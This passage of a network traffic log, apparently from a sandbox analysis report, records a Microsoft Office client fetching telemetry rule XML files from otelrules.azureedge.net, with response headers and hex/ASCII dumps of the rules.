                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175951Z-174f7845968j6t2phC1EWRcfe800000016a000000000wr2f
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            74192.168.2.44998613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:51 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                            x-ms-request-id: f237f1e0-b01e-0001-2400-4546e2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175951Z-174f7845968vqt9xhC1EWRgten00000016e00000000003cp
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:52 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            75192.168.2.44998913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:52 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:53 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                            x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175953Z-174f78459688l8rvhC1EWRtzr00000000kv000000000fxad
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            76192.168.2.44998813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:52 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:53 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                            x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175953Z-174f7845968xlwnmhC1EWR0sv8000000162g00000000h93y
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            77192.168.2.44999213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:53 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                            x-ms-request-id: bff90166-801e-0083-05f9-44f0ae000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175953Z-174f784596886s2bhC1EWR743w00000016cg0000000048re
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            78192.168.2.44999313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:53 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                            x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175953Z-174f7845968xlwnmhC1EWR0sv8000000163g00000000d0nh
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            79192.168.2.44999413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:53 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:54 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                            x-ms-request-id: 26935917-f01e-0003-011b-414453000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175954Z-174f7845968j6t2phC1EWRcfe800000016f0000000008cta
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:54 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            80192.168.2.44999613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:55 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                            x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175955Z-174f7845968vqt9xhC1EWRgten000000167g00000000qsh7
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            81192.168.2.44999713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:55 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                            x-ms-request-id: 20d43c3b-001e-0049-3b6b-435bd5000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175955Z-174f7845968nxc96hC1EWRspw8000000160000000000f9h2
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            82192.168.2.44999813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:55 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                            x-ms-request-id: b90abfc1-e01e-0003-2962-430fa8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175955Z-174f7845968cpnpfhC1EWR3afc00000015y000000000928h
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
